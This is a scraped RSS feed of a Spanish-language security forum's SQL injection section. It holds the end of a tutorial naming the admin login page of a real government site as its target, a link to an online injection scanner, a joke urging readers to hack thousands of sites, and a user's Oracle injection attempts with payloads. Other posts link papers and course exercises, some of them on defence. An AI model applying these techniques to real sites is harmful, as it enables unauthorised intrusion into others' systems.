Una ùltima cosa antes de terminar con el tuto es enseñarles abuscar un panel de Admin, pueden usar Crawlers como el de Acunetix, pueden usar Pipper si estan en GNU/Linux o cualquier script que tenga un bue ndiccionario.

En mi caso sucede que el panelde admin del MOND.gov.kh es:

http://www.mond.gov.kh/login.html

Yapa final:

Aca les dejo el scanner de inyecciones SQL desarrolado por el grupo F-Security subido Online y funcional: http://www.upperbasement.com/STMB/

Aprovechen mientras este online y funcione que les facilita e trabajo solo tiene que colocar la url hasta el id y la scanea en busca de tablas vulnerbles ytmb encuentra “information_schema” si esta.

Creo que con esto estamos y doy por finalizado el tutorial, vallan a kakear 12344 webs o sigan estudiando y entiendan poruqe carajo ocurre todo esto y cuales son las vias de solucion al problema

Saludos...]]> LU73K SQL Injections GeneralesTue, 23 Feb 2010 15:48:45 -0500 https://foro.undersecurity.net/read.php?46,4074,4074#msg-4074 ¿Cuantos tipos de Injecciones SQL Existen? (1 reply)https://foro.undersecurity.net/read.php?46,4074,4074#msg-4074¿Cuantos tipos de Injecciones SQL Existen?


  1. SQL Union Injection
  2. Blind SQL Injection
  3. Blind Time Based SQL Injection
  4. Blind Time Based SQL Injection With heavy Querys
]]> OzX SQL Injections GeneralesMon, 19 Oct 2009 18:48:38 -0400 https://foro.undersecurity.net/read.php?46,4064,4064#msg-4064 ¿Que se puede obtener a travez de las Inyecciones SQL? (no replies)https://foro.undersecurity.net/read.php?46,4064,4064#msg-4064
Básicamente esto depende del usuario que se conecta a la base de datos y sus permisos, ya que dependiendo de estos ultimos, podríamos ver, o modificar e inclusive crear datos.

Algunas Inyecciones nos permiten tal como se mencionó acceder a datos, algunos otros casos ingresar a paneles de Administración de sitios, entre otros.

Es un riesgo muy grande poseer errores de programación en nuestro sitio web que permitan inyecciones SQL, ya que con ello podríamos llegar a comprometer toda la seguridad de nuestro servidor.]]> 1995 SQL Injections GeneralesSat, 29 Aug 2009 00:28:54 -0400 https://foro.undersecurity.net/read.php?46,4041,4041#msg-4041 Ayuda con injección SQL en oracle (2 replies)https://foro.undersecurity.net/read.php?46,4041,4041#msg-4041
Cuando meto esto:

Language: SQL
a'

da error

y cuando meto esto:

Language: SQL
a''

no da error :p

así que me imaginé que la sentencia seria algo así ya que al meter % en el buscador (es un buscador la parte vulnerable) no da error y muestra todos los registros:

Language: SQL
SELECT * FROM tabla WHERE campo LIKE '%valor%'

así que probé introduciendo:

Language: SQL
' or '%'='

pero sigue dando error :'(

alguna sugerencia :p??]]> h SQL Injections GeneralesWed, 26 Aug 2009 15:11:40 -0400 https://foro.undersecurity.net/read.php?46,3824,3824#msg-3824 Penetration from application down to OS [Oracle Database] (no replies)https://foro.undersecurity.net/read.php?46,3824,3824#msg-3824

Download]]> OzX SQL Injections GeneralesFri, 07 Aug 2009 23:06:15 -0400 https://foro.undersecurity.net/read.php?46,3652,3652#msg-3652 ALL SQL Injection Videos [Mysql,Postgresql,MSSQL..] (6 replies)https://foro.undersecurity.net/read.php?46,3652,3652#msg-3652

Download

Fuente


Buenos videos , para hacerse una idea de como son las injecciones en otras base de datos.]]> OzX SQL Injections GeneralesMon, 16 Nov 2009 00:06:17 -0500 https://foro.undersecurity.net/read.php?46,3532,3532#msg-3532 “Vulnerabilidades en Aplicaciones Web PHP” [SQL Injection PostgreSQL] (no replies)https://foro.undersecurity.net/read.php?46,3532,3532#msg-3532Es de un Congreso Llamado ciisa del año 2007.
En lo personal me gusto la Parte de las Inyecciones en Postgresql.



Ejercicio 1. Explotar SQL Injection en consulta de inserción. ( 10 Minutos )
Ejercicio 2. Explotar SQL Injection para burlar una pantalla de autenticación. ( 10 Minutos )
Ejercicio 3. Explotar SQL Injection para cambiar el password de los usuarios. ( 10 Minutos )
Ejercicio 4. Proteger el sistema de SQL injection con PDO y pg_escape_string(). ( 30 Minutos )
Ejercicio 5. Enviar un valor no válido para un campo HTML <select>. ( 15 Minutos )
Ejercicio 6. Code Injection ( 15 Minutos )
Ejercicio 7. Usar Ethereal para capturar un sessid y robar la sesión ( 15 Minutos )
Ejercicio 8. Crear un sessid y usarlo para robar una sesiòn ( 15 Minutos )
Ejercicio 9. Proteger la información de sesión en una base de datos ( 30 Minutos )
Ejercicio 10. Proteger el sessid ligandolo a la IP del usuario que inicia sesión. ( 10 Minutos )



Download
Fuente

Saludos¡]]> OzX SQL Injections GeneralesFri, 24 Jul 2009 18:04:21 -0400 https://foro.undersecurity.net/read.php?46,3417,3417#msg-3417 An Introduction to SQL Injection Attacks for Oracle Developers (no replies)https://foro.undersecurity.net/read.php?46,3417,3417#msg-3417


Download
Mirror]]> OzX SQL Injections GeneralesSun, 19 Jul 2009 22:35:18 -0400 https://foro.undersecurity.net/read.php?46,3260,3260#msg-3260 Having Fun With PostgreSQL (no replies)https://foro.undersecurity.net/read.php?46,3260,3260#msg-3260
Descargar]]> OzX SQL Injections GeneralesSat, 11 Jul 2009 22:17:04 -0400 https://foro.undersecurity.net/read.php?46,2973,2973#msg-2973 Advanced PostgreSQL SQL Injection and Filter Bypass Techniques (no replies)https://foro.undersecurity.net/read.php?46,2973,2973#msg-2973

Download]]> OzX SQL Injections GeneralesMon, 29 Jun 2009 21:37:14 -0400